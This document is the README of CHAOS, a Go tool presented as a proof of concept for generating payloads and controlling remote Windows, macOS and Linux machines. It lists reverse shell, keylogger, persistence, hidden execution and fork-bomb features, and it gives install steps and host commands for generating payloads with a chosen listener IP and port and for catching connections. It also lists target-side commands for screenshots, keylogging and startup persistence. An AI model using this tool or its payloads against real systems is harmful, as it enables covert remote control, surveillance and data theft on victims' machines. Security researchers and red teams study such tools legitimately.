CHAOS is a PoC that allows generating payloads and controlling remote operating systems.
Features
Feature | Windows | Mac | Linux |
---|---|---|---|
Reverse Shell | X | X | X |
Download File | X | X | X |
Upload File | X | X | X |
Screenshot | X | X | X |
Keylogger | X | | |
Persistence | X | | |
Open URL | X | X | X |
Get OS Info | X | X | X |
Fork Bomb | X | X | X |
Run Hidden | X | | |
Tested On
Kali Linux - ROLLING EDITION
How to Install
```bash
# Install dependencies
$ sudo apt install golang git -y
# Get this repository
$ go get github.com/tiagorlampert/CHAOS
# Get the external Go dependencies (all of them are required)
$ go get github.com/kbinani/screenshot
$ go get github.com/lxn/win
$ go get github.com/matishsiao/goInfo
$ go get golang.org/x/sys/windows
# You may see the message "package github.com/lxn/win: build constraints exclude all Go files".
# This occurs because the libraries are for Windows systems, but they are necessary to build the payload.
# Go into the repository
$ cd ~/go/src/github.com/tiagorlampert/CHAOS
# Run
$ go run main.go
```
How to Use
Command | On HOST does... |
---|---|
generate | Generate a payload (e.g. generate lhost=192.168.0.100 lport=8080 fname=chaos --windows ) |
lhost= | Specify an IP for the connection |
lport= | Specify a port for the connection |
fname= | Specify an output filename |
--windows | Target Windows |
--macos | Target Mac OS |
--linux | Target Linux |
listen | Listen for a new connection (e.g. listen lport=8080 ) |
serve | Serve files |
exit | Quit this program |
Command | On TARGET does... |
---|---|
download | File Download |
upload | File Upload |
screenshot | Take a Screenshot |
keylogger_start | Start Keylogger session |
keylogger_show | Show Keylogger session logs |
persistence_enable | Install at Startup |
persistence_disable | Remove from Startup |
getos | Get OS name |
lockscreen | Lock the OS screen |
openurl | Open the specified URL |
bomb | Run Fork Bomb |
clear | Clear the Screen |
back | Close connection but keep running on target |
exit | Close connection and exit on target |
FAQ
Why does the keylogger capture all letters as uppercase?
All letters captured by the keylogger are uppercase. This is a known issue; if anyone knows how to fix the keylogger function in Go, please contact me or open an issue.
Why is it necessary to get and install external libraries?
To implement the screenshot function I used a third-party library; you can check it at https://github.com/kbinani/screenshot and https://github.com/lxn/win. You must download and install it to generate the payload.
Contact
tiagorlampert@gmail.com